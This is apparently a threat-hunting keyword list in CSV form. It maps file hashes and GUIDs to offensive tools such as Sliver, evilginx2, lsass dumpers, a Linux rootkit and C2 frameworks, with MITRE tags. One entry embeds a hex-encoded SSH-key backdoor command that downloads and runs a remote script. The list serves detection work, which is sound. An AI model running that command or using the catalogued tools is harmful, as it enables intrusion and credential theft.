"*5b55d8a0b50b89156ef7d09cffede9385fdad53301c16f2570a1888e7ee1cdf7*",".{0,1000}5b55d8a0b50b89156ef7d09cffede9385fdad53301c16f2570a1888e7ee1cdf7.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*",".{0,1000}5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" "*5b6250d39e2f2855743616842353bab496aafcb7bc2a45169a54bc94f7939917*",".{0,1000}5b6250d39e2f2855743616842353bab496aafcb7bc2a45169a54bc94f7939917.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5b64c12376f1ec1b876ede9b84f6883ee5f1ee5065e945dc2115c5e04c02aadf*",".{0,1000}5b64c12376f1ec1b876ede9b84f6883ee5f1ee5065e945dc2115c5e04c02aadf.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*5b6868ca1b71f60e801421d7f1629422c0e894bf3c4d0d45778a483ca3d8a41a*",".{0,1000}5b6868ca1b71f60e801421d7f1629422c0e894bf3c4d0d45778a483ca3d8a41a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5bb0b56e047e1453a3695ec0b9478b84*",".{0,1000}5bb0b56e047e1453a3695ec0b9478b84.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*5bfec4da2bd86d19199d74b0b95f044a2dc4ef0fc40941315b0d0ac49e6fb890*",".{0,1000}5bfec4da2bd86d19199d74b0b95f044a2dc4ef0fc40941315b0d0ac49e6fb890.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*5c177feedd58a6ccc8287dee8c767dd486f2b5c55c234360be17f85fcbaa4501*",".{0,1000}5c177feedd58a6ccc8287dee8c767dd486f2b5c55c234360be17f85fcbaa4501.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3*",".{0,1000}5C3AD9AC\-C62C\-4AA8\-BAE2\-9AF920A652E3.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*5c5bd260c00111edc55b4bc8a82d72e0a510f738ce3696ab2bbcd4a38a84bb12*",".{0,1000}5c5bd260c00111edc55b4bc8a82d72e0a510f738ce3696ab2bbcd4a38a84bb12.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5c5dc6546877d616c4479df133654a0fbccc71d5279aa63f2ca560a5abfea31d*",".{0,1000}5c5dc6546877d616c4479df133654a0fbccc71d5279aa63f2ca560a5abfea31d.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*5c611fb030683dba08662997836b3b308c0278130bf2eee6ac6af6a4332285fe*",".{0,1000}5c611fb030683dba08662997836b3b308c0278130bf2eee6ac6af6a4332285fe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*5c778de24421d1fca1048bde1f9f37e75cd23a127199159d2064da3b26574faf*",".{0,1000}5c778de24421d1fca1048bde1f9f37e75cd23a127199159d2064da3b26574faf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5c78c058c8278438ce30b86b3ccda222410206ec0ea5727b93b74bb8c6748bd5*",".{0,1000}5c78c058c8278438ce30b86b3ccda222410206ec0ea5727b93b74bb8c6748bd5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5c899d6ea0bdfbe381997096421365463461811ac73b1f3d559aceb765a26472*",".{0,1000}5c899d6ea0bdfbe381997096421365463461811ac73b1f3d559aceb765a26472.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5c9765e765eabf0879fa522b08114cf379a2a8d3a6d92c4f9cfcb1ad49a9cf5d*",".{0,1000}5c9765e765eabf0879fa522b08114cf379a2a8d3a6d92c4f9cfcb1ad49a9cf5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5ca23515c4b5ea064981ecab60416b9a6b85e6220cd4ea7dff72522993251422*",".{0,1000}5ca23515c4b5ea064981ecab60416b9a6b85e6220cd4ea7dff72522993251422.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5ccafa7f7b00774dd423a64460ef3d1c551ee95f076107cb8353f6271819f4d7*",".{0,1000}5ccafa7f7b00774dd423a64460ef3d1c551ee95f076107cb8353f6271819f4d7.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*5cd6f1ac11ce75c742358c9225983712e9ae31fd16e052b377a795d8ba4d18f6*",".{0,1000}5cd6f1ac11ce75c742358c9225983712e9ae31fd16e052b377a795d8ba4d18f6.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*5cdce3c908a8a7a336d21543c1133071b6395e26ca882cafc05fb6dbdce075f1*",".{0,1000}5cdce3c908a8a7a336d21543c1133071b6395e26ca882cafc05fb6dbdce075f1.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*5cdec4449506fe06e507619c8f1a66d890d96bb2ea30f6ea37f997853a52b243*",".{0,1000}5cdec4449506fe06e507619c8f1a66d890d96bb2ea30f6ea37f997853a52b243.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*5ce31dbbcce69be63eaddd6759ea115162e96500f9ee185b106eb47c5c1417ce*",".{0,1000}5ce31dbbcce69be63eaddd6759ea115162e96500f9ee185b106eb47c5c1417ce.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*5cfed16ae88f9a36880352f6490b9c417c8d46744a606e453eabf813f26f1239*",".{0,1000}5cfed16ae88f9a36880352f6490b9c417c8d46744a606e453eabf813f26f1239.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5D03EFC2-72E9-4410-B147-0A1A5C743999*",".{0,1000}5D03EFC2\-72E9\-4410\-B147\-0A1A5C743999.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*5D10ED0A-6C52-49FE-90F5-CFAAECA8FABE*",".{0,1000}5D10ED0A\-6C52\-49FE\-90F5\-CFAAECA8FABE.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*5d16081315e1588a26019bb5195f2f72f278a3c86acf8cc1c072b791960beabf*",".{0,1000}5d16081315e1588a26019bb5195f2f72f278a3c86acf8cc1c072b791960beabf.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*5d3f3909639924fe921e0ff58be252bd671db7d2c2c0cf56d301f4ea48548306*",".{0,1000}5d3f3909639924fe921e0ff58be252bd671db7d2c2c0cf56d301f4ea48548306.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*5d43bbdef3c107cf95891b56c5b40febf853f0aca57991492a4025032a8fa050*",".{0,1000}5d43bbdef3c107cf95891b56c5b40febf853f0aca57991492a4025032a8fa050.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*5d447208b1a06d45b5563f56da869e3c6ffa8e67247809798d24065d719160e8*",".{0,1000}5d447208b1a06d45b5563f56da869e3c6ffa8e67247809798d24065d719160e8.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5d494fc79356aeb1e983aab7188e729550c1f54ffcdcb02270acc492f2164afa*",".{0,1000}5d494fc79356aeb1e983aab7188e729550c1f54ffcdcb02270acc492f2164afa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5d61397acd2c3b39da7f48673ce25690db669c68d538487cdf79ecc8b56f039d*",".{0,1000}5d61397acd2c3b39da7f48673ce25690db669c68d538487cdf79ecc8b56f039d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf*",".{0,1000}5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*5d848352fb3ae2109dd1ee927717c8c004f2e07f33b14d7fd25dba71784f5579*",".{0,1000}5d848352fb3ae2109dd1ee927717c8c004f2e07f33b14d7fd25dba71784f5579.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5da9049dbb09c0f24ee3732e407eb636230a1f8b8dea5f40e74651102229cd92*",".{0,1000}5da9049dbb09c0f24ee3732e407eb636230a1f8b8dea5f40e74651102229cd92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5dd1488efa5a855d71e3b60d9d398f1fcaae367c352e731ced194c0fa261ac95*",".{0,1000}5dd1488efa5a855d71e3b60d9d398f1fcaae367c352e731ced194c0fa261ac95.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5dec1cfe7c0c2ec55c17fb44b43f7d14*",".{0,1000}5dec1cfe7c0c2ec55c17fb44b43f7d14.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*5ded3e0d1d7d2261be33496b0c7e59c8b6604d6cca0f371caa669d3f47eb10f0*",".{0,1000}5ded3e0d1d7d2261be33496b0c7e59c8b6604d6cca0f371caa669d3f47eb10f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*",".{0,1000}5E0812A9\-C727\-44F3\-A2E3\-8286CDC3ED4F.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*5e1896cd6c5bc82e6369f5e143bf87a59b37775c7987d36e29ff1846c4863d98*",".{0,1000}5e1896cd6c5bc82e6369f5e143bf87a59b37775c7987d36e29ff1846c4863d98.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5e25477af34314dc8fd4fe2013845ec55572ac213148b70499b928bc4af1f1c1*",".{0,1000}5e25477af34314dc8fd4fe2013845ec55572ac213148b70499b928bc4af1f1c1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5e3261026ae988a6e7d629e1201733ea922d06b37d4d07df2223a1427ea8c63c*",".{0,1000}5e3261026ae988a6e7d629e1201733ea922d06b37d4d07df2223a1427ea8c63c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5e5a0618107570e45d2d2559d13658fb0e08f732*",".{0,1000}5e5a0618107570e45d2d2559d13658fb0e08f732.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*5e68b0a2d0424b4afb739ac7938e49ec2e9cb41999346aee22c0284aa1cdcf5c*",".{0,1000}5e68b0a2d0424b4afb739ac7938e49ec2e9cb41999346aee22c0284aa1cdcf5c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5e6cfa7f3d2e7bf2eadb2d4f197189d43798b3270c39bbe3a2fb99c5684ec686*",".{0,1000}5e6cfa7f3d2e7bf2eadb2d4f197189d43798b3270c39bbe3a2fb99c5684ec686.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*",".{0,1000}5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*5E9715AB-CAF7-4FFF-8E14-A8727891DA93*",".{0,1000}5E9715AB\-CAF7\-4FFF\-8E14\-A8727891DA93.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*5e98194a01c6b48fa582a6a9fcbb92d6*",".{0,1000}5e98194a01c6b48fa582a6a9fcbb92d6.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" 